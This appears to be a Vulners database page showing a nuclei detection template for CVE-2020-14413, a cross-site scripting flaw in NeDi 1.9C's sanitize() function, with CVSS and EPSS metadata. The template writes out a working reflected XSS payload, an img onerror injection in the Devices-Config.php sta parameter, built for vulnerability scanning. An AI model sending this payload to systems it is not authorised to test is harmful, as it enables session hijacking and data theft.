Lucene search
K

NeDi 1.9C - Cross-Site Scripting

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 46 Views

NeDi 1.9C - Cross-Site Scripting vulnerability in sanitize() function, allowing JS code executio

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
NeDi Consulting NeDi Cross-Site Scripting Vulnerability (CNVD-2020-44584)
30 Jun 202000:00
cnvd
CVE
CVE-2020-14413
29 Jun 202016:37
cve
Cvelist
CVE-2020-14413
29 Jun 202016:37
cvelist
NVD
CVE-2020-14413
29 Jun 202017:15
nvd
OSV
CVE-2020-14413
29 Jun 202017:15
osv
Prion
Design/Logic Flaw
29 Jun 202017:15
prion
RedhatCVE
CVE-2020-14413
22 May 202516:20
redhatcve
id: CVE-2020-14413

info:
  name: NeDi 1.9C - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: NeDi 1.9C is vulnerable to cross-site scripting because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of NeDi or apply the vendor-supplied patch to mitigate this vulnerability.
  reference:
    - https://gist.github.com/farid007/8db2ab5367ba00e87f9479b32d46fea8
    - https://nvd.nist.gov/vuln/detail/CVE-2020-14413
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Elsfa7-110/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-14413
    cwe-id: CWE-79
    epss-score: 0.03442
    epss-percentile: 0.87553
    cpe: cpe:2.3:a:nedi:nedi:1.9c:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: nedi
    product: nedi
  tags: cve,cve2020,nedi,xss,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img src=x onerror=alert(document.domain)>"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a1c3f392376f45d89f3ecae48356a9c7d44304101322cd4c668a3f3c2bf0f504022047c16282ee8a4f089eb9cd0bad1153f50dc0734b75c74e073530dcfc836532cd:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 24.3
CVSS 3.16.1
EPSS0.03442
46